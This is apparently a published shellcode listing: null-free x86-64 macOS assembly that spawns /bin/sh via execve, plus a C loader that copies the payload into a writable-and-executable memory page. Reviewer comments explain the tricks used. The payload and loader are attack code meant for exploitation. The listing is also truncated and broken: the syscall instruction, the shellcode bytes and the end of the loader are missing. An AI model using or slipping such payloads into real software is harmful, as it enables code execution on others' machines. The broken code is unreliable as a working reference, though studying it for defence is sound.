macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)

2019-02-18 19:05:16

# Title: macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)
# Date: 2019-02-17
# Tested: macOS 10.14.1
# Author: Ken Kitahara
# Compilation: gcc -o loader loader.c

dev:works devuser$ sw_vers
ProductName: Mac OS X
ProductVersion: 10.14.1
BuildVersion: 18B75
dev:works devuser$ cat binsh.s
section .text
global start
; execve("//bin/sh", 0, 0)
; Analyst notes: the double slash pads the path to exactly 8 bytes so the whole
; string fits one 64-bit immediate with no 0x00 byte in it (the "null-free"
; property in the title). Every zero the code needs is produced with xor/push
; instead of being encoded. The visible instructions sum to 28 bytes, fewer than
; the 31 claimed in the title, so this extraction is probably missing its tail.
xor rax, rax                  ; rax = 0 without encoding a 0x00 byte
push rax                      ; 8 zero bytes: NUL terminator for the path
mov rdi, 0x68732f6e69622f2f   ; "//bin/sh" as a little-endian qword
push rdi                      ; path now at [rsp], terminated by the zeros above
push rsp
pop rdi                       ; rdi = rsp (arg 1, path); 2 bytes vs 3 for mov rdi,rsp
xor rsi, rsi                  ; rsi = 0 (arg 2, argv)
                              ; NOTE(review): rdx (arg 3, envp) is never set here,
                              ; so the "0" in the comment above relies on rdx
                              ; already being 0 at entry — confirm for the target.
mov al, 0x2
ror rax, 0x28                 ; rax = 2 rotated right by 40 = 0x2000000, the BSD
                              ; syscall-class prefix used on macOS
mov al, 0x3b                  ; rax = 0x200003b: 59 (execve) within that class
dev:works devuser$ nasm -f macho64 -o binsh.o binsh.s && ld -macosx_version_min 10.7.0 -o binsh binsh.o
dev:works devuser$ for i in $(objdump -d ./binsh.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
dev:works devuser$

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

/* Function pointer that main() points at the mmap'd buffer. This is an old
 * non-prototype declaration; `int (*sc)(void);` is the C11-conforming spelling. */
int (*sc)();

/* Byte string holding the payload. NOTE(review): the initializer itself is not
 * present in this listing (truncated extraction). */
char shellcode[] =

/* Loader: maps an RWX anonymous page, copies the payload into it and hands
 * control to it through `sc`. argc/argv are unused. NOTE(review): the MAP_FAILED
 * branch body and the end of this function (including its closing brace) are
 * missing from this listing, so it does not compile as shown. */
int main(int argc, char **argv) {
/* strlen() stops at the first 0x00 byte, so a payload that is not actually
 * null-free shows up here as a length shorter than sizeof(shellcode) - 1.
 * strlen returns size_t: `%zu` is the matching conversion, `%zd` expects a
 * signed value. */
printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));

/* 0x22 (34) bytes mapped writable AND executable in one step. This violates
 * W^X: with the macOS hardened runtime enabled, a PROT_WRITE|PROT_EXEC anonymous
 * mapping is refused unless the binary carries a JIT entitlement, and RWX
 * anonymous mappings are a common signal for endpoint detection rules. */
void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);

if (ptr == MAP_FAILED) {
/* NOTE(review): the error-handling body of this branch is absent from the
 * listing; as extracted the brace above is never closed. */

/* sizeof copies the terminating NUL too (payload length + 1), which still fits
 * inside the 0x22-byte mapping. */
memcpy(ptr, shellcode, sizeof(shellcode));
/* Object-pointer to function-pointer conversion: not defined by ISO C, but the
 * usual POSIX idiom. */
sc = ptr;

/* NOTE(review): the mapping is never released with munmap() in the visible
 * code, and the remainder of main is not present in this extraction. */
return 0;

